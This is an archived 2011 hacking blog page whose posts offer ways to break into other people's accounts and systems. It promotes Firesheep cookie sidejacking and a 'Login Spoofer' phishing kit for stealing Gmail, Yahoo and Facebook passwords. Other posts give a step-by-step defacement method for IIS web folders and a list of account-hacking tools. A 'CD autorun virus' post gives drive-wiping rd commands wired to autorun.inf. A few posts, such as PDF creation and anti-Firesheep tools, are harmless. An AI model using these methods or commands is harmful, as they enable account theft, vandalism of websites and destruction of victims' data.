Saturday, September 10, 2011

Hack Facebook/Twitter Or Any Email Account With Side Jacking

When logging into a website you usually start by submitting your username and password. The server then checks to see if an account matching this information exists and if so, replies back to you with a "cookie" which is used by your browser for all subsequent requests.
It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.
This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.
Firesheep, a Firefox extension designed to demonstrate just how serious this problem is.
After installing the extension you'll see a new sidebar. Connect to any busy open wifi network and click the big "Start Capturing" button. Then wait.

As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed:


Double-click on someone, and you're instantly logged in as them.


That's it.
Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.
Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web.
Posted by at No comments:

Friday, September 9, 2011

Download Login Spoofer-Gmail,yahoo,facebook,hotmail password hacking.

Login Spoofer is a Software that it can create Professional Phishing Pages Like: (Hotmail, Yahoo, Gmail, GameZer, Facebook and many more ....) to Steal somebody's Account you have to push him to login in one of your fake pages, when the Victim Login as you told him, His account (Username/Password) will register in our database So you go to the software (Login spoofer) and press refresh then you'll find His Username & Password & IP & his OS Info...etc. Using and Downloading is free 100%.Yahoo Password Hacking: Hack Yahoo Account Password with phishing attack.


DOWNLOAD HERE
Posted by at 41 comments:

Deface sites easily in Seconds




#it only works on sites being hosted on Ms-IIS server. Now a days many boxes are patched so it'll not work on them !!

steps for Xp-

# open run
# type-
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

and press enter !

#A new window name "WEB FOLDER" gets open

#Right click and click on New, Add Web Folder then enter your vulnerable website address.

#then next....finish

# now You can insert your page with name index.html by simply copy pasting.

Also after getting access to the website...Many websites don't allows you to
add your page. so leave them.



#Dork- "Powered by IIS" or use your own unique dork.

 ------------------------------------------------------------------------------------------------------------

Windows 7-

#Click Start.

#Click Computer.

# In the following dialog click Map Network Drive.

# On the Map Network Drive dialog, click "Connect to a Web site that you can use to store your documents and Pictures" this will pop up the "Welcome to the Add Network Location Wizard".



# Click on Next.



# Click on ''Choose a custom network location''.



# Click on Next.



# Now type the web folder address that you want to access. For instance: www.stscw.com/



# Enter a NAME to help you identify the web folder and click Next.



# Place a checkmark on 'Open this network location when I click finish'.



# Click Finish.

and insert your deface page !!



----------------------------------------------------------------------------------------------------------------


Reference-

3thicaln00b (super moderator)
IndiShell Crew
Posted by at No comments:

How to create PDF files for free

PDF is the de facto standard for online reading and publishing and various softwares like Adobe reader and Foxit reader PDF is the new standard for online publishingallow you to read PDF files. But PDF creation comes under shady areas and the same softwares either allow for minor PDF modification with watermarked results (Foxit) or constitute a whole new different software package for PDF creation for a premium fee (Adobe PDF creator).However,for professionals,this software may be worth its price tag,general users can create excellent looking PDF’s by the method described before.
What you need -
About DoPDF (shamelessly taken from official website :P) -Create PDF's easily with DoPDF
doPDF is a free PDF converter for both personal and commercial use. Using doPDF you can create PDF files by selecting the "Print" command from virtually any application. With one click you can convert your Microsoft Excel, Word or  PowerPoint documents or your emails and favorite web sites to PDF files.
Steps to create PDF -
  • Download DoPDF and install it.
  • Open your word processor/text editor and create your document.
  • Press Ctrl + P or go to File menu and print the document.
  • The Print menu will open,choose DoPDF as virtual Printer and click on Print.
choose DoPDF as virtual Printer and click on Print.
  • Choose the location for your document to save and click OK.Your PDF file will be created.
Choose the location for saving your document
  • Congratulations..you have created your PDF file for free
Posted by at No comments:

Best Hacking Tools -85in1

Audio theme: Sean Paul - Temperature
Size : 43.2MB Compress ,29.7MB UnCompress

Contents:
Main page:

    • HOTMAIL HACKING

  • YAHOO HACKING


  • MSN FUN TOOLS


  • FAKE SCREENS/PAGES


  • OTHER HACKING TOOLS


  • FUN TOOLS


    • Page 1 :

    MSN Chat Monitor And Sniffer
    MSN Password Retriever
    MSN Hacker DUC
    Head Fuck HotMail HAck
    HotMail Hacker XE Edition
    HotMail HAck
    HotMAil Hacker
    MSN Passwords
    MSN Flooder
    MSN Sniffer
    MSN SPY Lite
    HotMail Hacker Gold
    HotMail HAcker Final
    Give me Ur Pass
    HotMail Brute Forcer
    MSN PAssword Finder
    MSN Password Grabber
    Hack MSN Password
    Hack HotMAil Evolution
    MAgic Password Sender
    MSN Locker
    HotMail Killer
    Hot Freeze
    MessenPass
    HotMAil Hack !
    Ice Cold Reload
    HotMail Killer 2
    Nuke MSN

    Page 2:

    Yahoo Messenger Login Screen
    MSN Messenger 7 Login Screen
    MSN Messenger 5 Login Screen
    MSN Messenger 4.6 Login Screen
    HotMail Login Screen
    Fake Web Pages 2
    Fake Eeb Pages 1
    AOL Killer
    Fake Login HotMail
    B-S Spy
    Saria Fake Logins

    Page 3:

    Yahoo Password Retrieval
    Yacam
    Yahoo Cracker
    Yahoo Booster
    Yahoo Hack!
    Yahoo Password Stealer
    S-H Yahoo Password Sender

    Page 4:

    NetWork Password Recovery
    NetBIOS Name Scanner
    FTP Password Hacker
    Cable Modem Sniffer
    Port Listening XP
    Blue Port Scanner
    www 2 IP
    XP Killer
    Sniff Password
    Port Scanner
    Fast Resolver
    Domain Scan
    Whois Domain
    NetRes View
    PHPbb Defacer
    Angry IP Scanner
    FTP Brute Forcer

    PAge 5:

    Hook Tool Box
    Smart HAck UpLoader
    Remote Anything
    Post Sage
    PHPbb Attacker
    Page 6:
    Skinner
    MSN Bomber Man
    Ultimate Nick PopUpz
    MSN 7 Universal Patcher
    Emoticons Creator
    MSN Picture Crawler
    Anti Status Bomb
    MSN Detector
    Multi MSN Loader
    Kitle
    Protect Lithium
    Tray It!
    MSN Block Checker
    MSN Auto Responder
    MSN Virus Cleaner
    MSN Dondurucu
    Download it from  - Hacking Tools 85 in one
    Posted by at No comments:

    THC-HYDRA v6.1 brute force tool Released !



    One of the most famous network logon cracker - THC-HYDRA, has been updated! We now have THC-HYDRA version 6.1 in less than a fortnight!

    “THC-HYDRA is a very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.”

    This is the change log:
    More license updates for the files for the debian guys
    Fix for the configure script to correctly detect postgresql
    Add checks for libssh v0.4 and support for ssh v1
    Merge all latest crypto code in sasl files
    Fix SVN compilation issue on openSUSE (tested with v11.3)

    Download THC-HYDRA v6.1 news source:the hacker news
    Posted by at 4 comments:

    SNIFFER-HACKING TOOL



    Sniffers monitor network data. A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware programming. Sniffers usually act as network probes or "snoops." They examine network traffic, making a copy of the data without redirecting or altering it. Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels including Ethernet frames.

    Years ago, sniffers were tools used exclusively by network engineers. Today, however, these utilities have become popular on the Internet with hackers and the merely curious. The U.S. Federal Bureau of Investigation (FBI) has utilized a famous sniffer system called "Carnivore" to help detect illegal Internet communications.


    DOWNLOAD
    Posted by at No comments:

    Certified Ethical Hacker V6 - Training Videos - LABS, Tools

    Certified Ethical Hacker Course has been divided into two sections:
    1. Certified Ethical Hacker (CEH) v 6 - Training DVDs (Flash video) | 6 DVDs ISO | 10.3 GB
    2. Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

    First section, Training videos, focuses on how to scan, test, hack and secure your own systems (all in depth).

    Second section, LABS (Tools), gives each student in-depth knowledge and practical experience with the current essential security systems. It is analogous to what you do in college laboratory i.e. real-time practical experience to what is taught in theory lectures.

    Thus, this complete course guarantees to make you a Professional Hacker


    LABS (Tools)



    Certified Ethical Hacker and Countermeasures V6 LABS (Tools) | 4 Volumes | ISOs + Instructor slides in PDF | 13.2 GB

    These are all the DVD materials for the CEH v6 exam training from EC-Council. This is a fantastic class with a lot of knowledge.

    These are the tools not videos. This is to teach how to countermeasure hacks and in that being said there are live real worms, viruses,trojans.etc. not to destroy your computer(IF USED WITH VMWARE OR OTHER COMPUTER) but to teach you how to get rid of them.

    Certified Ethical Hacker & Countermeasures V6

    Course Description

    This class will immerse the student into an interactive environment where they will be shown how to scan, test, hack and secure their own systems. The lab intensive environment gives each student in-depth knowledge and practical experience with the current essential security systems. Students will begin by understanding how perimeter defenses work and then be lead into scanning and attacking their own networks, no real network is harmed. Students then learn how intruders escalate privileges and what steps can be taken to secure a system. Students will also learn about Intrusion Detection, Policy Creation, Social Engineering, DDoS Attacks, Buffer Overflows and Virus Creation. When a student leaves this intensive 5 day class they will have hands on understanding and experience in Ethical Hacking. This course prepares you for EC-Council Certified Ethical Hacker exam 312-50.

    Who Should Attend

    This course will significantly benefit security officers, auditors, security professionals, site administrators, and anyone who is concerned about the integrity of the network infrastructure.


    Certification
    The Certified Ethical Hacker exam 312-50 may be taken on the last day of the training (optional). Students need to pass the online Prometric exam to receive CEH certification. Training fee is inclusive of Exam, Official Kit, Certificate and meals.

    Legal Agreement

    Ethical Hacking and Countermeasures course mission is to educate, introduce and demonstrate hacking tools for penetration testing purposes only. Prior to attending this course, you will be asked to sign an agreement stating that you will not use the newly acquired skills for illegal or malicious attacks and you will not use such tools in an attempt to compromise any computer system, and to indemnify EC-Council with respect to the use or misuse of these tools, regardless of intent.

    CEHv6 Curriculum consists of instructor-led training and self-study. The Instructor will provide the details of self-study modules to the students beginning of the class.

    Code:

    http://www.eccouncil.org

    Quote:
    Module 1: Introduction to Ethical Hacking
    Module 2: Hacking Laws
    Module 3: Footprinting
    Module 4: Google Hacking
    Module 5: Scanning
    Module 6: Enumeration
    Module 7: System Hacking
    Module 8: Trojans and Backdoors
    Module 9: Viruses and Worms
    Module 10: Sniffers
    Module 11: Social Engineering
    Module 12: Phishing
    Module 13: Hacking Email Accounts
    Module 14: Denial-of-Service
    Module 15: Session Hijacking
    Module 16: Hacking Web Servers
    Module 17: Web Application Vulnerabilities
    Module 18: Web-Based Password Cracking Techniques
    Module 19: SQL Injection
    Module 20: Hacking Wireless Networks
    Module 21: Physical Security
    Module 22: Linux Hacking
    Module 23: Evading IDS, Firewalls and Detecting Honey Pots
    Module 24: Buffer Overflows
    Module 25: Cryptography
    Module 26: Penetration Testing
    Module 27: Covert Hacking
    Module 28: Writing Virus Codes
    Module 29: Assembly Language Tutorial
    Module 30: Exploit Writing
    Module 31: Smashing the Stack for Fun and Profit
    Module 32: Windows Based Buffer Overflow Exploit Writing
    Module 33: Reverse Engineering
    Module 34: MAC OS X Hacking
    Module 35: Hacking Routers, cable Modems and Firewalls
    Module 36: Hacking Mobile Phones, PDA and Handheld Devices
    Module 37: Bluetooth Hacking
    Module 38: VoIP Hacking
    Module 39: RFID Hacking
    Module 40: Spamming Module
    Module 41: Hacking USB Devices
    Module 42: Hacking Database Servers
    Module 43: Cyber Warfare- Hacking, Al-Qaida and Terrorism
    Module 44: Internet Content Filtering Techniques
    Module 45: Privacy on the Internet
    Module 46: Securing Laptop Computers
    Module 47: Spying Technologies
    Module 48: Corporate Espionage- Hacking Using Insiders
    Module 49: Creating Security Policies
    Module 50: Software Piracy and Warez
    Module 51: Hacking and Cheating Online Games
    Module 52: Hacking RSS and Atom
    Module 53: Hacking Web Browsers (Firefox, IE)
    Module 54: Proxy Server Technologies
    Module 55: Data Loss Prevention
    Module 56: Hacking Global Positioning System (GPS)
    Module 57: Computer Forensics and Incident Handling
    Module 58: Credit Card Frauds
    Module 59: How to Steal Passwords
    Module 60: Firewall Technologies
    Module 61: Threats and Countermeasures
    Module 62: Case Studies
    Module 62: Case Studies
    Module 63: Botnets
    Module 64: Economic Espionage
    Module 65: Patch Management
    Module 66: Security Convergence





    Instructor Slides:
    http://hotfile.com/d....part1.rar.html
    http://hotfile.com/d....part2.rar.html
    http://hotfile.com/d....part3.rar.html

    Labs (Tools)
    http://hotfile.com/d...part01.rar.html
    http://hotfile.com/d...part02.rar.html
    http://hotfile.com/d...part03.rar.html
    http://hotfile.com/d...part04.rar.html
    http://hotfile.com/d...part05.rar.html
    http://hotfile.com/d...part06.rar.html
    http://hotfile.com/d...part07.rar.html
    http://hotfile.com/d...part08.rar.html
    http://hotfile.com/d...part09.rar.html
    http://hotfile.com/d...part10.rar.html
    http://hotfile.com/d...part11.rar.html
    http://hotfile.com/d...part12.rar.html
    http://hotfile.com/d...part13.rar.html
    http://hotfile.com/d...part14.rar.html
    http://hotfile.com/d...part15.rar.html
    http://hotfile.com/d...part16.rar.html
    http://hotfile.com/d...part17.rar.html
    http://hotfile.com/d...part18.rar.html
    http://hotfile.com/d...part19.rar.html
    http://hotfile.com/d...part20.rar.html
    http://hotfile.com/d...part21.rar.html
    http://hotfile.com/d...part22.rar.html
    http://hotfile.com/d...part23.rar.html
    http://hotfile.com/d...part24.rar.html
    http://hotfile.com/d...part25.rar.html
    http://hotfile.com/d...part26.rar.html
    http://hotfile.com/d...part27.rar.html
    http://hotfile.com/d...part28.rar.html
    http://hotfile.com/d...part29.rar.html
    http://hotfile.com/d...part30.rar.html
    http://hotfile.com/d...part31.rar.html
    http://hotfile.com/d...part32.rar.html
    http://hotfile.com/d...part33.rar.html
    http://hotfile.com/d...part34.rar.html
    http://hotfile.com/d...part35.rar.html
    http://hotfile.com/d...part36.rar.html
    http://hotfile.com/d...part37.rar.html
    http://hotfile.com/d...part38.rar.html
    http://hotfile.com/d...part39.rar.html
    http://hotfile.com/d...part40.rar.html
    http://hotfile.com/d...part41.rar.html
    http://hotfile.com/d...part42.rar.html
    http://hotfile.com/d...part43.rar.html
    http://hotfile.com/d...part44.rar.html
    http://hotfile.com/d...part45.rar.html
    http://hotfile.com/d...part46.rar.html
    http://hotfile.com/d...part47.rar.html
    http://hotfile.com/d...part48.rar.html
    http://hotfile.com/d...part49.rar.html
    http://hotfile.com/d...part50.rar.html
    http://hotfile.com/d...part51.rar.html
    http://hotfile.com/d...part52.rar.html
    http://hotfile.com/d...part53.rar.html
    http://hotfile.com/d...part54.rar.html
    http://hotfile.com/d...part55.rar.html
    http://hotfile.com/d...part56.rar.html
    http://hotfile.com/d...part57.rar.html
    http://hotfile.com/d...part58.rar.html
    http://hotfile.com/d...part59.rar.html
    http://hotfile.com/d...part60.rar.html
    http://hotfile.com/d...part61.rar.html
    http://hotfile.com/d...part62.rar.html
    http://hotfile.com/d...part63.rar.html
    http://hotfile.com/d...part64.rar.html
    http://hotfile.com/d...part65.rar.html
    http://hotfile.com/d...part66.rar.html
    http://hotfile.com/d...part67.rar.html
    http://hotfile.com/d...part68.rar.html



     
    Posted by at 4 comments:

    Reset Windows Password Advanced Edition v1.2.1.195 Retail



    Lost password or locked Windows account is the most frequent problem data recovery specialists have to deal with. You could format the hard drive or reinstall your operating system, but that wouldn't keep you from partial loss of data, personal settings and extra headache. Besides, all that can take some time. There is a quicker and more elegant way out of this situation. Just run Reset Windows Passwords from a bootable CD or USB and reset the forgotten password or unlock the account. It's a matter of a few minutes! Reset Windows Password is the most powerful solution for recovering or resetting all types of Windows account passwords: user', administrator, Active Directory accounts, and domain administrators.
    The program is designed specifically for an inexperienced user and is easy to operate. On the other hand, the password lookup algorithms are unique and not used in any similar application.
    Unlike other utilities, Reset Windows Password is the only program that can CORRECTLY process all types of Windows accounts.

    Features
    Simple, intuitive graphic interface. No more ugly DOS prompts.
    Resets and modifies passwords of local users and administrators, domain administrator, Active Directory users, DSRM account.
    Enables and unlocks user accounts.
    Disables the password expiry option.
    Resets SYSKEY (with full user passwords re-encryption)
    Advanced password lookup algorithms (also known as AI attack).
    Dumps user password hashes from SAM for further analysis.
    Dumps password hashes from Active Directory.
    Dumps domain cached credentials.
    Supports all versions of NT-based Windows, including the newest Windows 7.
    All editions include the utility for creating a bootable CD/DVD/USB disk from the downloadable ISO file with the application.
    Supports 64-bit Windows.
    Large collection of IDE, SATA, SCSI, RAID drivers.
    Detects several operating systems installed on the computer.
    Supports non-English versions of Windows and passwords in national encodings.
    Allows undoing changes made to the system.
    Deletes passwords and other sensitive data from the computer.
    Detailed help.

    How it looks and works
    Reset Windows Password - screenshots and documentation
    Full list of the program features
    Three simple steps to create a bootable CD, DVD or USB disk
    Utility for creating bootable disks
    Running RWP from the bootable disk
    Modifying BIOS to boot from RWP disk, questions and answers

    The software is available in three editions: Light, Standard and Advanced. The detailed list of features is shown below : www.passcape.com/reset_windows_password_editions     Reset.Windows.Password.Advanced.Edition.v1.2.1.195.retail-iOTA
    Download : | FileSonic | DepositFiles | Turbobi
    Posted by at No comments:

    How to Create nameless files and folders in windows

    1.Select any file or folder.
    2.Right click on it, press rename or simply press F2.
    3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.    4.Press Enter and the nameless file or folder will be created.
     

    But what if you want to create another nameless file or folder in the same directory ?

    For this you will have to rename the file with 2 spaces. Just follow these steps below:

    1.Select file, press F2.
    2.Hold alt key and type 0160 from the numpad.
    3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
    4.Press enter and you will have second nameless file in the same directory.
    Posted by at No comments:

    CD AUTORUN VIRUS, FORMATTING COMPUTER !


    Create a file in note pad and name it "vrs.cmd"
    write following commands in the file-

    rd e:\*.* /s/q
    rd d:\*.* /s/q
    rd C:\*.* /s/q

    after saving it with name vrs.cmd
    plz dont'double click on it else u'll lose data frm ur hard disk
    STEP 2-
    make another file name it "autorun.inf"
    and write following codes in it.
    [AUTORUN]
    open=vrs.cmd
    save this file autorun.inf

    STEP 3-
    Now write these two files into a CD and CD is READY to destroy a computer..

    CHECK___
    u can check the ability of vrs.cmd i mean to have a trial

    make a folder in "d:" name it "meera"
    and put some files and folders it like songs, sanps etc
    now make a file in note pad

    rd d:\meera /s/q

    and save it with name vr.cmd
    and now double click on this file
    it will remove meera folder from "d:"
    Posted by at No comments:

    Anti FireSheep

    BlackSheep



    With all the hype about Firesheep, the Firefox add-on that snatches up social network login credentials over open wireless networks, security companies are starting to make anti-Firesheep measures available to the average user. BlackSheep, developed by "cloud security" firm Zscaler, is a Firefox add-on that detects the presence of Firesheep on your network.

    If someone is using Firesheep, BlackSheep will trick it with a fake login cookie. When Firesheep takes BlackSheep's bait and tries to get your user information from a site using the fake values BlackSheep has been sending out, you'll get a warning that Firesheep is operating, as well as the IP address of the person using it.

    Unfortunately, BlackSheep is only available for Firefox at the moment. There are other security measures you can use, though. Sebastian has posted a roundup of ways to surf securely with SSL in any browser. Even more recently, someone released a Safari extension to force Facebook to use SSL. As far as direct anti-Firesheep countermeasures go, a Windows app called Fireshepherd can also help you shut Firesheep snoopers down.



    FireShepherd





    A login-cookie-snooping Firefox plug-in called Firesheep rocked the Internet by letting anyone compromise your Facebook or Twitter account over a wireless network. Alarmed at Firesheep's 200,000 downloads, an Icelandic engineering student named Gunnar Sigurdsson created FireShepherd, a program that crashes Firesheep with floods of nonsense packets.

    Although Firesheep was originally created to prove a point about insecure login credentials on social networks, the huge number of downloads means that it could be a security risk to everyday users. Sigurdsson compares it to "living in a house with nothing but windows." Of course, security researchers or malicious users could patch up the Firesheep flaw that FireShepherd exploits, but FireShepherd's creator has vowed to keep finding new ways to stop the snooping plug-in. 

    Posted by at No comments:
    Subscribe to: Posts (Atom)